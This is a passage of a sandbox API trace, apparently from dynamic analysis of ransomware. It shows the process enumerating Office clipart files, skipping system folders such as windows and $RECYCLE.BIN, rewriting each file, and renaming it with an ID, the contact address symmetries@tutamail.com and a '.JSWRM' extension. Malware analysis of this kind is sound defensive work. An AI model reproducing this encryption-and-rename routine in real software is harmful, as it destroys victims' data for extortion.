lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xfb0, lpOverlapped=0x0) returned 1 [0074.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.935] CloseHandle (hObject=0x460) returned 1 [0074.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0074.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0074.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0074.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0074.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0074.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.936] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0074.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.937] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcdbb058, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x386c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00247_.WMF", cAlternateFileName="")) returned 1 [0074.937] lstrcmpiW (lpString1="BL00247_.WMF", lpString2=".") returned 1 [0074.937] lstrcmpiW (lpString1="BL00247_.WMF", lpString2="..") returned 1 [0074.937] lstrcmpiW (lpString1="BL00247_.WMF", lpString2="...") returned 1 [0074.937] lstrcmpiW (lpString1="BL00247_.WMF", lpString2="windows") returned -1 [0074.937] lstrcmpiW (lpString1="BL00247_.WMF", lpString2="recovery") returned -1 [0074.937] lstrcmpiW (lpString1="BL00247_.WMF", lpString2="perflogs") returned -1 [0074.937] lstrcmpiW (lpString1="BL00247_.WMF", lpString2="documents and settings") returned -1 [0074.937] lstrcmpiW (lpString1="BL00247_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.937] lstrcmpiW (lpString1="BL00247_.WMF", lpString2="system volume information") returned -1 [0074.937] lstrcmpiW (lpString1="BL00247_.WMF", lpString2="msocache") returned -1 [0074.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0074.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00247_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00247_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00247_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0074.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0074.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00247_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00247_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00247_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0074.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.938] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14444) returned 1 [0074.938] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3860) returned 0x24c1d0 [0074.938] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3860, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x3860, lpOverlapped=0x0) returned 1 [0074.940] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.940] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3860, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x3860, lpOverlapped=0x0) returned 1 [0074.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.940] CloseHandle (hObject=0x460) returned 1 [0074.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0074.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0074.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0074.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0074.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0074.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.941] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0074.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.944] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00248_.WMF", cAlternateFileName="")) returned 1 [0074.944] lstrcmpiW (lpString1="BL00248_.WMF", lpString2=".") returned 1 [0074.945] lstrcmpiW (lpString1="BL00248_.WMF", lpString2="..") returned 1 [0074.945] lstrcmpiW (lpString1="BL00248_.WMF", lpString2="...") returned 1 [0074.945] lstrcmpiW (lpString1="BL00248_.WMF", lpString2="windows") returned -1 [0074.945] lstrcmpiW (lpString1="BL00248_.WMF", lpString2="recovery") returned -1 [0074.945] lstrcmpiW (lpString1="BL00248_.WMF", lpString2="perflogs") returned -1 [0074.945] lstrcmpiW (lpString1="BL00248_.WMF", lpString2="documents and settings") returned -1 [0074.945] lstrcmpiW (lpString1="BL00248_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.945] lstrcmpiW (lpString1="BL00248_.WMF", lpString2="system volume information") returned -1 [0074.945] lstrcmpiW (lpString1="BL00248_.WMF", lpString2="msocache") returned -1 [0074.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0074.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00248_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00248_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00248_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0074.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0074.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00248_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00248_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00248_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0074.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.945] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1536) returned 1 [0074.945] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x600) returned 0x23fc98 [0074.946] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x600, lpOverlapped=0x0) returned 1 [0074.947] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.947] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x600, lpOverlapped=0x0) returned 1 [0074.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0074.947] CloseHandle (hObject=0x460) returned 1 [0074.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0074.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0074.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0074.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0074.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0074.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.948] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0074.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.948] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcdbb058, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1264, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00252_.WMF", cAlternateFileName="")) returned 1 [0074.948] lstrcmpiW (lpString1="BL00252_.WMF", lpString2=".") returned 1 [0074.948] lstrcmpiW (lpString1="BL00252_.WMF", lpString2="..") returned 1 [0074.948] lstrcmpiW (lpString1="BL00252_.WMF", lpString2="...") returned 1 [0074.948] lstrcmpiW (lpString1="BL00252_.WMF", lpString2="windows") returned -1 [0074.948] lstrcmpiW (lpString1="BL00252_.WMF", lpString2="recovery") returned -1 [0074.948] lstrcmpiW (lpString1="BL00252_.WMF", lpString2="perflogs") returned -1 [0074.949] lstrcmpiW (lpString1="BL00252_.WMF", lpString2="documents and settings") returned -1 [0074.949] lstrcmpiW (lpString1="BL00252_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.949] lstrcmpiW (lpString1="BL00252_.WMF", lpString2="system volume information") returned -1 [0074.949] lstrcmpiW (lpString1="BL00252_.WMF", lpString2="msocache") returned -1 [0074.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0074.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00252_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00252_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00252_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0074.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0074.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00252_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00252_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00252_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0074.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.949] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4708) returned 1 [0074.949] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1260) returned 0x24c1d0 [0074.949] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1260, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1260, lpOverlapped=0x0) returned 1 [0074.951] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.951] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1260, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1260, lpOverlapped=0x0) returned 1 [0074.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.951] CloseHandle (hObject=0x460) returned 1 [0074.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0074.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0074.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0074.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0074.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0074.951] HeapFree (in: 